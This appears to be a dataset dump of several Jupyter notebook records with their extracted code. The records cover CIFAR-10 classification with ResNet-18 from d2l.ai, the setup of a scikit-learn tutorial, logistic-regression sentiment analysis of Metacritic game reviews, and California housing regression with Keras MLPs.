from torch import nn
import os
import pandas as pd
import shutil
```
## Obtaining and Organizing the Dataset
The competition data is divided into a training set and testing set. The training set contains $50,000$ images. The testing set contains $300,000$ images, of which $10,000$ images are used for scoring, while the other $290,000$ non-scoring images are included to prevent the manual labeling of the testing set and the submission of labeling results. The image formats in both datasets are PNG, with heights and widths of 32 pixels and three color channels (RGB). The images cover $10$ categories: planes, cars, birds, cats, deer, dogs, frogs, horses, boats, and trucks. The upper-left corner of :numref:`fig_kaggle_cifar10` shows some images of planes, cars, and birds in the dataset.
### Downloading the Dataset
After logging in to Kaggle, we can click on the "Data" tab on the CIFAR-10 image classification competition webpage shown in :numref:`fig_kaggle_cifar10` and download the dataset by clicking the "Download All" button. After unzipping the downloaded file in `../data`, and unzipping `train.7z` and `test.7z` inside it, you will find the entire dataset in the following paths:
* ../data/cifar-10/train/[1-50000].png
* ../data/cifar-10/test/[1-300000].png
* ../data/cifar-10/trainLabels.csv
* ../data/cifar-10/sampleSubmission.csv
Here folders `train` and `test` contain the training and testing images respectively, `trainLabels.csv` has labels for the training images, and `sample_submission.csv` is a sample of submission.
To make it easier to get started, we provide a small-scale sample of the dataset: it contains the first $1000$ training images and $5$ random testing images.
To use the full dataset of the Kaggle competition, you need to set the following `demo` variable to `False`.
```
#@save
d2l.DATA_HUB['cifar10_tiny'] = (d2l.DATA_URL + 'kaggle_cifar10_tiny.zip',
'2068874e4b9a9f0fb07ebe0ad2b29754449ccacd')
# If you use the full dataset downloaded for the Kaggle competition, set
# `demo` to False
demo = True
if demo:
data_dir = d2l.download_extract('cifar10_tiny')
else:
data_dir = '../data/cifar-10/'
```
### Organizing the Dataset
We need to organize datasets to facilitate model training and testing. Let us first read the labels from the csv file. The following function returns a dictionary that maps the filename without extension to its label.
```
#@save
def read_csv_labels(fname):
"""Read fname to return a name to label dictionary."""
with open(fname, 'r') as f:
# Skip the file header line (column name)
lines = f.readlines()[1:]
tokens = [l.rstrip().split(',') for l in lines]
return dict(((name, label) for name, label in tokens))
labels = read_csv_labels(os.path.join(data_dir, 'trainLabels.csv'))
print('# training examples:', len(labels))
print('# classes:', len(set(labels.values())))
```
Next, we define the `reorg_train_valid` function to segment the validation set from the original training set. The argument `valid_ratio` in this function is the ratio of the number of examples in the validation set to the number of examples in the original training set. In particular, let $n$ be the number of images of the class with the least examples, and $r$ be the ratio, then we will use $\max(\lfloor nr\rfloor,1)$ images for each class as the validation set. Let us use `valid_ratio=0.1` as an example. Since the original training set has $50,000$ images, there will be $45,000$ images used for training and stored in the path "`train_valid_test/train`" when tuning hyperparameters, while the other $5,000$ images will be stored as validation set in the path "`train_valid_test/valid`". After organizing the data, images of the same class will be placed under the same folder so that we can read them later.
```
#@save
def copyfile(filename, target_dir):
"""Copy a file into a target directory."""
os.makedirs(target_dir, exist_ok=True)
shutil.copy(filename, target_dir)
#@save
def reorg_train_valid(data_dir, labels, valid_ratio):
# The number of examples of the class with the least examples in the
# training dataset
n = collections.Counter(labels.values()).most_common()[-1][1]
# The number of examples per class for the validation set
n_valid_per_label = max(1, math.floor(n * valid_ratio))
label_count = {}
for train_file in os.listdir(os.path.join(data_dir, 'train')):
label = labels[train_file.split('.')[0]]
fname = os.path.join(data_dir, 'train', train_file)
# Copy to train_valid_test/train_valid with a subfolder per class
copyfile(fname, os.path.join(data_dir, 'train_valid_test',
'train_valid', label))
if label not in label_count or label_count[label] < n_valid_per_label:
# Copy to train_valid_test/valid
copyfile(fname, os.path.join(data_dir, 'train_valid_test',
'valid', label))
label_count[label] = label_count.get(label, 0) + 1
else:
# Copy to train_valid_test/train
copyfile(fname, os.path.join(data_dir, 'train_valid_test',
'train', label))
return n_valid_per_label
```
The `reorg_test` function below is used to organize the testing set to facilitate the reading during prediction.
```
#@save
def reorg_test(data_dir):
for test_file in os.listdir(os.path.join(data_dir, 'test')):
copyfile(os.path.join(data_dir, 'test', test_file),
os.path.join(data_dir, 'train_valid_test', 'test',
'unknown'))
```
Finally, we use a function to call the previously defined `read_csv_labels`, `reorg_train_valid`, and `reorg_test` functions.
```
def reorg_cifar10_data(data_dir, valid_ratio):
labels = read_csv_labels(os.path.join(data_dir, 'trainLabels.csv'))
reorg_train_valid(data_dir, labels, valid_ratio)
reorg_test(data_dir)
```
We only set the batch size to $4$ for the demo dataset. During actual training and testing, the complete dataset of the Kaggle competition should be used and `batch_size` should be set to a larger integer, such as $128$. We use $10\%$ of the training examples as the validation set for tuning hyperparameters.
```
batch_size = 4 if demo else 128
valid_ratio = 0.1
reorg_cifar10_data(data_dir, valid_ratio)
```
## Image Augmentation
To cope with overfitting, we use image augmentation. For example, by adding `transforms.RandomFlipLeftRight()`, the images can be flipped at random. We can also perform normalization for the three RGB channels of color images using `transforms.Normalize()`. Below, we list some of these operations that you can choose to use or modify depending on requirements.
```
transform_train = torchvision.transforms.Compose([
# Magnify the image to a square of 40 pixels in both height and width
torchvision.transforms.Resize(40),
# Randomly crop a square image of 40 pixels in both height and width to
# produce a small square of 0.64 to 1 times the area of the original
# image, and then shrink it to a square of 32 pixels in both height and
# width
torchvision.transforms.RandomResizedCrop(32, scale=(0.64, 1.0),
ratio=(1.0, 1.0)),
torchvision.transforms.RandomHorizontalFlip(),
torchvision.transforms.ToTensor(),
# Normalize each channel of the image
torchvision.transforms.Normalize([0.4914, 0.4822, 0.4465],
[0.2023, 0.1994, 0.2010])])
```
In order to ensure the certainty of the output during testing, we only perform normalization on the image.
```
transform_test = torchvision.transforms.Compose([
torchvision.transforms.ToTensor(),
torchvision.transforms.Normalize([0.4914, 0.4822, 0.4465],
[0.2023, 0.1994, 0.2010])])
```
## Reading the Dataset
Next, we can create the `ImageFolderDataset` instance to read the organized dataset containing the original image files, where each example includes the image and label.
```
train_ds, train_valid_ds = [torchvision.datasets.ImageFolder(
os.path.join(data_dir, 'train_valid_test', folder),
transform=transform_train) for folder in ['train', 'train_valid']]
valid_ds, test_ds = [torchvision.datasets.ImageFolder(
os.path.join(data_dir, 'train_valid_test', folder),
transform=transform_test) for folder in ['valid', 'test']]
```
We specify the defined image augmentation operation in `DataLoader`. During training, we only use the validation set to evaluate the model, so we need to ensure the certainty of the output. During prediction, we will train the model on the combined training set and validation set to make full use of all labelled data.
```
train_iter, train_valid_iter = [torch.utils.data.DataLoader(
dataset, batch_size, shuffle=True, drop_last=True)
for dataset in (train_ds, train_valid_ds)]
valid_iter = torch.utils.data.DataLoader(valid_ds, batch_size, shuffle=False,
drop_last=True)
test_iter = torch.utils.data.DataLoader(test_ds, batch_size, shuffle=False,
drop_last=False)
```
## Defining the Model
Here, we build the residual blocks based on the `HybridBlock` class, which is
slightly different than the implementation described in
:numref:`sec_resnet`. This is done to improve execution efficiency.
Next, we define the ResNet-18 model.
The CIFAR-10 image classification challenge uses 10 categories. We will perform Xavier random initialization on the model before training begins.
```
def get_net():
num_classes = 10
# PyTorch doesn't have the notion of hybrid model
net = d2l.resnet18(num_classes, 3)
return net
loss = nn.CrossEntropyLoss(reduction="none")
```
## Defining the Training Functions
We will select the model and tune hyperparameters according to the model's performance on the validation set. Next, we define the model training function `train`. We record the training time of each epoch, which helps us compare the time costs of different models.
```
def train(net, train_iter, valid_iter, num_epochs, lr, wd, devices, lr_period,
lr_decay):
trainer = torch.optim.SGD(net.parameters(), lr=lr, momentum=0.9,
weight_decay=wd)
scheduler = torch.optim.lr_scheduler.StepLR(trainer, lr_period, lr_decay)
num_batches, timer = len(train_iter), d2l.Timer()
animator = d2l.Animator(xlabel='epoch', xlim=[1, num_epochs],
legend=['train loss', 'train acc', 'valid acc'])
net = nn.DataParallel(net, device_ids=devices).to(devices[0])
for epoch in range(num_epochs):
net.train()
metric = d2l.Accumulator(3)
for i, (features, labels) in enumerate(train_iter):
timer.start()
l, acc = d2l.train_batch_ch13(net, features, labels,
loss, trainer, devices)
metric.add(l, acc, labels.shape[0])
timer.stop()
if (i + 1) % (num_batches // 5) == 0 or i == num_batches - 1:
animator.add(epoch + (i + 1) / num_batches,
(metric[0] / metric[2], metric[1] / metric[2],
None))
if valid_iter is not None:
valid_acc = d2l.evaluate_accuracy_gpu(net, valid_iter)
animator.add(epoch + 1, (None, None, valid_acc))
scheduler.step()
if valid_iter is not None:
print(f'loss {metric[0] / metric[2]:.3f}, '
f'train acc {metric[1] / metric[2]:.3f}, '
f'valid acc {valid_acc:.3f}')
else:
print(f'loss {metric[0] / metric[2]:.3f}, '
f'train acc {metric[1] / metric[2]:.3f}')
print(f'{metric[2] * num_epochs / timer.sum():.1f} examples/sec '
f'on {str(devices)}')
```
## Training and Validating the Model
Now, we can train and validate the model. The following hyperparameters can be tuned. For example, we can increase the number of epochs. Because `lr_period` and `lr_decay` are set to 50 and 0.1 respectively, the learning rate of the optimization algorithm will be multiplied by 0.1 after every 50 epochs. For simplicity, we only train one epoch here.
```
devices, num_epochs, lr, wd = d2l.try_all_gpus(), 5, 0.1, 5e-4
lr_period, lr_decay, net = 50, 0.1, get_net()
train(net, train_iter, valid_iter, num_epochs, lr, wd, devices, lr_period,
lr_decay)
```
## Classifying the Testing Set and Submitting Results on Kaggle
After obtaining a satisfactory model design and hyperparameters, we use all training datasets (including validation sets) to retrain the model and classify the testing set.
```
net, preds = get_net(), []
train(net, train_valid_iter, None, num_epochs, lr, wd, devices, lr_period,
lr_decay)
for X, _ in test_iter:
y_hat = net(X.to(devices[0]))
preds.extend(y_hat.argmax(dim=1).type(torch.int32).cpu().numpy())
sorted_ids = list(range(1, len(test_ds) + 1))
sorted_ids.sort(key=lambda x: str(x))
df = pd.DataFrame({'id': sorted_ids, 'label': preds})
df['label'] = df['label'].apply(lambda x: train_valid_ds.classes[x])
df.to_csv('submission.csv', index=False)
```
After executing the above code, we will get a "submission.csv" file. The format
of this file is consistent with the Kaggle competition requirements. The method
for submitting results is similar to method in :numref:`sec_kaggle_house`.
## Summary
* We can create an `ImageFolderDataset` instance to read the dataset containing the original image files.
* We can use convolutional neural networks, image augmentation, and hybrid programming to take part in an image classification competition.
## Exercises
1. Use the complete CIFAR-10 dataset for the Kaggle competition. Change the `batch_size` and number of epochs `num_epochs` to 128 and 100, respectively. See what accuracy and ranking you can achieve in this competition.
1. What accuracy can you achieve when not using image augmentation?
1. Scan the QR code to access the relevant discussions and exchange ideas about the methods used and the results obtained with the community. Can you come up with any better techniques?
[Discussions](https://discuss.d2l.ai/t/1479)
|
github_jupyter
|
import collections
from d2l import torch as d2l
import math
import torch
import torchvision
from torch import nn
import os
import pandas as pd
import shutil
#@save
d2l.DATA_HUB['cifar10_tiny'] = (d2l.DATA_URL + 'kaggle_cifar10_tiny.zip',
'2068874e4b9a9f0fb07ebe0ad2b29754449ccacd')
# If you use the full dataset downloaded for the Kaggle competition, set
# `demo` to False
demo = True
if demo:
data_dir = d2l.download_extract('cifar10_tiny')
else:
data_dir = '../data/cifar-10/'
#@save
def read_csv_labels(fname):
"""Read fname to return a name to label dictionary."""
with open(fname, 'r') as f:
# Skip the file header line (column name)
lines = f.readlines()[1:]
tokens = [l.rstrip().split(',') for l in lines]
return dict(((name, label) for name, label in tokens))
labels = read_csv_labels(os.path.join(data_dir, 'trainLabels.csv'))
print('# training examples:', len(labels))
print('# classes:', len(set(labels.values())))
#@save
def copyfile(filename, target_dir):
"""Copy a file into a target directory."""
os.makedirs(target_dir, exist_ok=True)
shutil.copy(filename, target_dir)
#@save
def reorg_train_valid(data_dir, labels, valid_ratio):
# The number of examples of the class with the least examples in the
# training dataset
n = collections.Counter(labels.values()).most_common()[-1][1]
# The number of examples per class for the validation set
n_valid_per_label = max(1, math.floor(n * valid_ratio))
label_count = {}
for train_file in os.listdir(os.path.join(data_dir, 'train')):
label = labels[train_file.split('.')[0]]
fname = os.path.join(data_dir, 'train', train_file)
# Copy to train_valid_test/train_valid with a subfolder per class
copyfile(fname, os.path.join(data_dir, 'train_valid_test',
'train_valid', label))
if label not in label_count or label_count[label] < n_valid_per_label:
# Copy to train_valid_test/valid
copyfile(fname, os.path.join(data_dir, 'train_valid_test',
'valid', label))
label_count[label] = label_count.get(label, 0) + 1
else:
# Copy to train_valid_test/train
copyfile(fname, os.path.join(data_dir, 'train_valid_test',
'train', label))
return n_valid_per_label
#@save
def reorg_test(data_dir):
for test_file in os.listdir(os.path.join(data_dir, 'test')):
copyfile(os.path.join(data_dir, 'test', test_file),
os.path.join(data_dir, 'train_valid_test', 'test',
'unknown'))
def reorg_cifar10_data(data_dir, valid_ratio):
labels = read_csv_labels(os.path.join(data_dir, 'trainLabels.csv'))
reorg_train_valid(data_dir, labels, valid_ratio)
reorg_test(data_dir)
batch_size = 4 if demo else 128
valid_ratio = 0.1
reorg_cifar10_data(data_dir, valid_ratio)
transform_train = torchvision.transforms.Compose([
# Magnify the image to a square of 40 pixels in both height and width
torchvision.transforms.Resize(40),
# Randomly crop a square image of 40 pixels in both height and width to
# produce a small square of 0.64 to 1 times the area of the original
# image, and then shrink it to a square of 32 pixels in both height and
# width
torchvision.transforms.RandomResizedCrop(32, scale=(0.64, 1.0),
ratio=(1.0, 1.0)),
torchvision.transforms.RandomHorizontalFlip(),
torchvision.transforms.ToTensor(),
# Normalize each channel of the image
torchvision.transforms.Normalize([0.4914, 0.4822, 0.4465],
[0.2023, 0.1994, 0.2010])])
transform_test = torchvision.transforms.Compose([
torchvision.transforms.ToTensor(),
torchvision.transforms.Normalize([0.4914, 0.4822, 0.4465],
[0.2023, 0.1994, 0.2010])])
train_ds, train_valid_ds = [torchvision.datasets.ImageFolder(
os.path.join(data_dir, 'train_valid_test', folder),
transform=transform_train) for folder in ['train', 'train_valid']]
valid_ds, test_ds = [torchvision.datasets.ImageFolder(
os.path.join(data_dir, 'train_valid_test', folder),
transform=transform_test) for folder in ['valid', 'test']]
train_iter, train_valid_iter = [torch.utils.data.DataLoader(
dataset, batch_size, shuffle=True, drop_last=True)
for dataset in (train_ds, train_valid_ds)]
valid_iter = torch.utils.data.DataLoader(valid_ds, batch_size, shuffle=False,
drop_last=True)
test_iter = torch.utils.data.DataLoader(test_ds, batch_size, shuffle=False,
drop_last=False)
def get_net():
num_classes = 10
# PyTorch doesn't have the notion of hybrid model
net = d2l.resnet18(num_classes, 3)
return net
loss = nn.CrossEntropyLoss(reduction="none")
def train(net, train_iter, valid_iter, num_epochs, lr, wd, devices, lr_period,
lr_decay):
trainer = torch.optim.SGD(net.parameters(), lr=lr, momentum=0.9,
weight_decay=wd)
scheduler = torch.optim.lr_scheduler.StepLR(trainer, lr_period, lr_decay)
num_batches, timer = len(train_iter), d2l.Timer()
animator = d2l.Animator(xlabel='epoch', xlim=[1, num_epochs],
legend=['train loss', 'train acc', 'valid acc'])
net = nn.DataParallel(net, device_ids=devices).to(devices[0])
for epoch in range(num_epochs):
net.train()
metric = d2l.Accumulator(3)
for i, (features, labels) in enumerate(train_iter):
timer.start()
l, acc = d2l.train_batch_ch13(net, features, labels,
loss, trainer, devices)
metric.add(l, acc, labels.shape[0])
timer.stop()
if (i + 1) % (num_batches // 5) == 0 or i == num_batches - 1:
animator.add(epoch + (i + 1) / num_batches,
(metric[0] / metric[2], metric[1] / metric[2],
None))
if valid_iter is not None:
valid_acc = d2l.evaluate_accuracy_gpu(net, valid_iter)
animator.add(epoch + 1, (None, None, valid_acc))
scheduler.step()
if valid_iter is not None:
print(f'loss {metric[0] / metric[2]:.3f}, '
f'train acc {metric[1] / metric[2]:.3f}, '
f'valid acc {valid_acc:.3f}')
else:
print(f'loss {metric[0] / metric[2]:.3f}, '
f'train acc {metric[1] / metric[2]:.3f}')
print(f'{metric[2] * num_epochs / timer.sum():.1f} examples/sec '
f'on {str(devices)}')
devices, num_epochs, lr, wd = d2l.try_all_gpus(), 5, 0.1, 5e-4
lr_period, lr_decay, net = 50, 0.1, get_net()
train(net, train_iter, valid_iter, num_epochs, lr, wd, devices, lr_period,
lr_decay)
net, preds = get_net(), []
train(net, train_valid_iter, None, num_epochs, lr, wd, devices, lr_period,
lr_decay)
for X, _ in test_iter:
y_hat = net(X.to(devices[0]))
preds.extend(y_hat.argmax(dim=1).type(torch.int32).cpu().numpy())
sorted_ids = list(range(1, len(test_ds) + 1))
sorted_ids.sort(key=lambda x: str(x))
df = pd.DataFrame({'id': sorted_ids, 'label': preds})
df['label'] = df['label'].apply(lambda x: train_valid_ds.classes[x])
df.to_csv('submission.csv', index=False)
| 0.724578 | 0.916372 |
<small><i>This notebook was put together by [Jake Vanderplas](http://www.vanderplas.com). Source and license info is on [GitHub](https://github.com/jakevdp/sklearn_tutorial/).</i></small>
# An Introduction to scikit-learn: Machine Learning in Python
## Goals of this Tutorial
- **Introduce the basics of Machine Learning**, and some skills useful in practice.
- **Introduce the syntax of scikit-learn**, so that you can make use of the rich toolset available.
## Schedule:
**Preliminaries: Setup & introduction** (15 min)
* Making sure your computer is set-up
**Basic Principles of Machine Learning and the Scikit-learn Interface** (45 min)
* What is Machine Learning?
* Machine learning data layout
* Supervised Learning
- Classification
- Regression
- Measuring performance
* Unsupervised Learning
- Clustering
- Dimensionality Reduction
- Density Estimation
* Evaluation of Learning Models
* Choosing the right algorithm for your dataset
**Supervised learning in-depth** (1 hr)
* Support Vector Machines
* Decision Trees and Random Forests
**Unsupervised learning in-depth** (1 hr)
* Principal Component Analysis
* K-means Clustering
* Gaussian Mixture Models
**Model Validation** (1 hr)
* Validation and Cross-validation
## Preliminaries
This tutorial requires the following packages:
- Python version 2.7 or 3.4+
- `numpy` version 1.8 or later: http://www.numpy.org/
- `scipy` version 0.15 or later: http://www.scipy.org/
- `matplotlib` version 1.3 or later: http://matplotlib.org/
- `scikit-learn` version 0.15 or later: http://scikit-learn.org
- `ipython`/`jupyter` version 3.0 or later, with notebook support: http://ipython.org
- `seaborn`: version 0.5 or later, used mainly for plot styling
The easiest way to get these is to use the [conda](http://store.continuum.io/) environment manager.
I suggest downloading and installing [miniconda](http://conda.pydata.org/miniconda.html).
The following command will install all required packages:
```
$ conda install numpy scipy matplotlib scikit-learn ipython-notebook
```
Alternatively, you can download and install the (very large) Anaconda software distribution, found at https://store.continuum.io/.
### Checking your installation
You can run the following code to check the versions of the packages on your system:
(in IPython notebook, press `shift` and `return` together to execute the contents of a cell)
```
from __future__ import print_function
import IPython
print('IPython:', IPython.__version__)
import numpy
print('numpy:', numpy.__version__)
import scipy
print('scipy:', scipy.__version__)
import matplotlib
print('matplotlib:', matplotlib.__version__)
import sklearn
print('scikit-learn:', sklearn.__version__)
```
## Useful Resources
- **scikit-learn:** http://scikit-learn.org (see especially the narrative documentation)
- **matplotlib:** http://matplotlib.org (see especially the gallery section)
- **Jupyter:** http://jupyter.org (also check out http://nbviewer.jupyter.org)
|
github_jupyter
|
$ conda install numpy scipy matplotlib scikit-learn ipython-notebook
from __future__ import print_function
import IPython
print('IPython:', IPython.__version__)
import numpy
print('numpy:', numpy.__version__)
import scipy
print('scipy:', scipy.__version__)
import matplotlib
print('matplotlib:', matplotlib.__version__)
import sklearn
print('scikit-learn:', sklearn.__version__)
| 0.467575 | 0.962568 |
```
import numpy as np
import pandas as pd
import re
import os
import random
import spacy
from spacy.util import minibatch, compounding
from sklearn.model_selection import train_test_split
from sklearn.feature_extraction.text import CountVectorizer
from sklearn.linear_model import LogisticRegression
from sklearn.metrics import accuracy_score
```
## File input and cleaning
```
def label_sentiment(filename):
'''
Looks at rating values and assigns eithe positive or negative, will be used to test and train
'''
df = pd.read_csv(filename)
ls = []
for index, row in df.iterrows():
if row['rating'] >= 7:
label = 'pos'
elif row['rating'] <= 4:
label = 'neg'
ls.append(label)
df['label'] = ls
ls2 = []
for index, row in df.iterrows():
clean = row['review'].strip()
ls2.append(clean)
df['review'] = ls2
ls3 = []
for index, row in df.iterrows():
if row['rating'] >= 7:
sentiment = 1
elif row['rating'] <= 4:
sentiment = 0
ls3.append(sentiment)
df['sentiment'] = ls3
return df
def remove_emoji(string):
emoji_pattern = re.compile("["
u"\U0001F600-\U0001F64F" # emoticons
u"\U0001F300-\U0001F5FF" # symbols & pictographs
u"\U0001F680-\U0001F6FF" # transport & map symbols
u"\U0001F1E0-\U0001F1FF" # flags (iOS)
u"\U00002702-\U000027B0"
u"\U000024C2-\U0001F251"
"]+", flags=re.UNICODE)
return emoji_pattern.sub(r'', string)
df = label_sentiment('MetacriticReviews_DOTA2.csv')
df['review'] = df['review'].apply(remove_emoji)
df.head()
df['sentiment'].value_counts()
X = df['review']
y = df['sentiment']
```
### classification by Logistic Regression
```
## split test-train 80/20
X_train, X_test, y_train, y_test = train_test_split(X,y,test_size=0.2)
len(X_train)
cv = CountVectorizer()
ctmTr = cv.fit_transform(X_train)
X_test_dtm = cv.transform(X_test)
model = LogisticRegression()
model.fit(ctmTr, y_train)
y_pred_class = model.predict(X_test_dtm)
y_pred_class
accuracy_score(y_test, y_pred_class)
```
### import valorant and League data
```
!ls
df_valorant = label_sentiment('MetacriticReviews_VALORANT PC.csv')
df_valorant['review'] = df_valorant['review'].apply(remove_emoji)
df_valorant.head()
## split valorant data
X_val = df_valorant['review']
y_val = df_valorant['sentiment']
X_train_val, X_test_val, y_train_val, y_test_val = train_test_split(X_val,y_val,test_size=0.2)
## test dota 2 classifier on Valorant test data
X_test_dtm_val = cv.transform(X_test_val)
y_pred_class_val = model.predict(X_test_dtm_val)
accuracy_score(y_test_val, y_pred_class_val)
## when trained on data from Dota 2, testing it on Valorant reviews, provides a fairly decent asccuracy score of 71%
## which is a drop of 5% from our original accuracy
```
|
github_jupyter
|
import numpy as np
import pandas as pd
import re
import os
import random
import spacy
from spacy.util import minibatch, compounding
from sklearn.model_selection import train_test_split
from sklearn.feature_extraction.text import CountVectorizer
from sklearn.linear_model import LogisticRegression
from sklearn.metrics import accuracy_score
def label_sentiment(filename):
'''
Looks at rating values and assigns eithe positive or negative, will be used to test and train
'''
df = pd.read_csv(filename)
ls = []
for index, row in df.iterrows():
if row['rating'] >= 7:
label = 'pos'
elif row['rating'] <= 4:
label = 'neg'
ls.append(label)
df['label'] = ls
ls2 = []
for index, row in df.iterrows():
clean = row['review'].strip()
ls2.append(clean)
df['review'] = ls2
ls3 = []
for index, row in df.iterrows():
if row['rating'] >= 7:
sentiment = 1
elif row['rating'] <= 4:
sentiment = 0
ls3.append(sentiment)
df['sentiment'] = ls3
return df
def remove_emoji(string):
emoji_pattern = re.compile("["
u"\U0001F600-\U0001F64F" # emoticons
u"\U0001F300-\U0001F5FF" # symbols & pictographs
u"\U0001F680-\U0001F6FF" # transport & map symbols
u"\U0001F1E0-\U0001F1FF" # flags (iOS)
u"\U00002702-\U000027B0"
u"\U000024C2-\U0001F251"
"]+", flags=re.UNICODE)
return emoji_pattern.sub(r'', string)
df = label_sentiment('MetacriticReviews_DOTA2.csv')
df['review'] = df['review'].apply(remove_emoji)
df.head()
df['sentiment'].value_counts()
X = df['review']
y = df['sentiment']
## split test-train 80/20
X_train, X_test, y_train, y_test = train_test_split(X,y,test_size=0.2)
len(X_train)
cv = CountVectorizer()
ctmTr = cv.fit_transform(X_train)
X_test_dtm = cv.transform(X_test)
model = LogisticRegression()
model.fit(ctmTr, y_train)
y_pred_class = model.predict(X_test_dtm)
y_pred_class
accuracy_score(y_test, y_pred_class)
!ls
df_valorant = label_sentiment('MetacriticReviews_VALORANT PC.csv')
df_valorant['review'] = df_valorant['review'].apply(remove_emoji)
df_valorant.head()
## split valorant data
X_val = df_valorant['review']
y_val = df_valorant['sentiment']
X_train_val, X_test_val, y_train_val, y_test_val = train_test_split(X_val,y_val,test_size=0.2)
## test dota 2 classifier on Valorant test data
X_test_dtm_val = cv.transform(X_test_val)
y_pred_class_val = model.predict(X_test_dtm_val)
accuracy_score(y_test_val, y_pred_class_val)
## when trained on data from Dota 2, testing it on Valorant reviews, provides a fairly decent asccuracy score of 71%
## which is a drop of 5% from our original accuracy
| 0.360264 | 0.723639 |
# California housing dataset regression with MLPs
In this notebook, we'll train a multi-layer perceptron model to to estimate median house values on Californian housing districts.
First, the needed imports. Keras tells us which backend (Theano, Tensorflow, CNTK) it will be using.
```
%matplotlib inline
from sklearn import datasets
from sklearn.model_selection import train_test_split
from sklearn.metrics import mean_squared_error
from sklearn.preprocessing import StandardScaler
from keras.models import Sequential
from keras.layers import Dense, Activation, Dropout
from keras.utils import np_utils
from keras import backend as K
from distutils.version import LooseVersion as LV
from keras import __version__
from IPython.display import SVG
from keras.utils.vis_utils import model_to_dot
import numpy as np
import matplotlib.pyplot as plt
import seaborn as sns
sns.set()
print('Using Keras version:', __version__, 'backend:', K.backend())
assert(LV(__version__) >= LV("2.0.0"))
```
## Data
Then we load the California housing data. First time we need to download the data, which can take a while.
```
chd = datasets.fetch_california_housing()
```
The data consists of 20640 housing districts, each characterized with 8 attributes: *MedInc, HouseAge, AveRooms, AveBedrms, Population, AveOccup, Latitude, Longitude*. There is also a target value (median house value) for each housing district.
Let's plot all attributes against the target value:
```
plt.figure(figsize=(15,10))
for i in range(8):
plt.subplot(4,2,i+1)
plt.scatter(chd.data[:,i], chd.target, s=2, label=chd.feature_names[i])
plt.legend(loc='best')
```
We'll now split the data into a training and a test set:
```
test_size = 5000
X_train_all, X_test_all, y_train, y_test = train_test_split(
chd.data, chd.target, test_size=test_size, shuffle=True)
X_train_single = X_train_all[:,0].reshape(-1, 1)
X_test_single = X_test_all[:,0].reshape(-1, 1)
print()
print('California housing data: train:',len(X_train_all),'test:',len(X_test_all))
print()
print('X_train_all:', X_train_all.shape)
print('X_train_single:', X_train_single.shape)
print('y_train:', y_train.shape)
print()
print('X_test_all', X_test_all.shape)
print('X_test_single', X_test_single.shape)
print('y_test', y_test.shape)
```
The training data matrix `X_train_all` is a matrix of size (`n_train`, 8), and `X_train_single` contains only the first attribute *(MedInc)*. `y_train` is a vector containing the target value (median house value) for each housing district in the training set.
Let's start our analysis with a single attribute *(MedInc)*:
```
X_train = X_train_single
X_test = X_test_single
#X_train = X_train_all
#X_test = X_test_all
```
As the final step, let's scale the input data to zero mean and unit variance:
```
scaler = StandardScaler().fit(X_train)
X_train = scaler.transform(X_train)
X_test = scaler.transform(X_test)
print('X_train: mean:', X_train.mean(axis=0), 'std:', X_train.std(axis=0))
print('X_test: mean:', X_test.mean(axis=0), 'std:', X_test.std(axis=0))
```
## One hidden layer
### Initialization
Let's begin with a simple model that has a single hidden layer. We first initialize the model with `Sequential()`. Then we add a `Dense` layer that has `X_train.shape[1]` inputs (one for each attribute in the training data) and 10 units. The `Dense` layer connects each input to each output with some weight parameter.
Then we have an output layer that has only one unit with a linear activation function.
Finally, we select *mean squared error* as the loss function, select [*stochastic gradient descent*](https://keras.io/optimizers/#sgd) as the optimizer, and `compile()` the model. Note there are [several different options](https://keras.io/optimizers/) for the optimizer in Keras that we could use instead of *sgd*.
```
linmodel = Sequential()
linmodel.add(Dense(units=10, input_dim=X_train.shape[1], activation='relu'))
linmodel.add(Dense(units=1, activation='linear'))
linmodel.compile(loss='mean_squared_error',
optimizer='sgd')
print(linmodel.summary())
```
We can also draw a fancier graph of our model.
```
SVG(model_to_dot(linmodel, show_shapes=True).create(prog='dot', format='svg'))
```
### Learning
Now we are ready to train our first model. An *epoch* means one pass through the whole training data.
You can run code below multiple times and it will continue the training process from where it left off. If you want to start from scratch, re-initialize the model using the code a few cells ago.
```
%%time
epochs = 10
linhistory = linmodel.fit(X_train,
y_train,
epochs=epochs,
batch_size=32,
verbose=2)
```
Let's now see how the training progressed. *Loss* is a function of the difference of the network output and the target values. We are minimizing the loss function during training so it should decrease over time.
```
plt.figure(figsize=(5,3))
plt.plot(linhistory.epoch,linhistory.history['loss'])
plt.title('loss');
if X_train.shape[1] == 1:
plt.figure(figsize=(10, 10))
plt.scatter(X_train, y_train, s=5)
reg_x = np.arange(np.min(X_train), np.max(X_train), 0.01).reshape(-1, 1)
plt.scatter(reg_x, linmodel.predict(reg_x), s=8, label='one hidden layer')
plt.legend(loc='best');
```
### Inference
For a better measure of the quality of the model, let's see the model accuracy for the test data.
```
%%time
predictions = linmodel.predict(X_test)
print("Mean squared error: %.3f"
% mean_squared_error(y_test, predictions))
```
## Multiple hidden layers
### Initialization
Let's now create a more complex MLP model that has multiple dense layers and dropout layers. `Dropout()` randomly sets a fraction of inputs to zero during training, which is one approach to regularization and can sometimes help to prevent overfitting.
The last layer needs to have a single unit with linear activation to match the groundtruth (`Y_train`).
Finally, we again `compile()` the model, this time using [*Adam*](https://keras.io/optimizers/#adam) as the optimizer.
```
mlmodel = Sequential()
mlmodel.add(Dense(units=20, input_dim=X_train.shape[1], activation='relu'))
mlmodel.add(Dense(units=20, activation='relu'))
mlmodel.add(Dropout(0.5))
mlmodel.add(Dense(units=1, activation='linear'))
mlmodel.compile(loss='mean_squared_error',
optimizer='adam')
print(mlmodel.summary())
SVG(model_to_dot(mlmodel, show_shapes=True).create(prog='dot', format='svg'))
```
### Learning
```
%%time
epochs = 10
history = mlmodel.fit(X_train,
y_train,
epochs=epochs,
batch_size=32,
verbose=2)
plt.figure(figsize=(5,3))
plt.plot(history.epoch,history.history['loss'])
plt.title('loss');
if X_train.shape[1] == 1:
plt.figure(figsize=(10, 10))
plt.scatter(X_train, y_train, s=5)
reg_x = np.arange(np.min(X_train), np.max(X_train), 0.01).reshape(-1, 1)
plt.scatter(reg_x, linmodel.predict(reg_x), s=8, label='one hidden layer')
plt.scatter(reg_x, mlmodel.predict(reg_x), s=8, label='multiple hidden layers')
plt.legend(loc='best');
```
### Inference
```
%%time
predictions = mlmodel.predict(X_test)
print("Mean squared error: %.3f"
% mean_squared_error(y_test, predictions))
```
## Model tuning
Try to reduce the mean squared error of the regression.
|
github_jupyter
|
%matplotlib inline
from sklearn import datasets
from sklearn.model_selection import train_test_split
from sklearn.metrics import mean_squared_error
from sklearn.preprocessing import StandardScaler
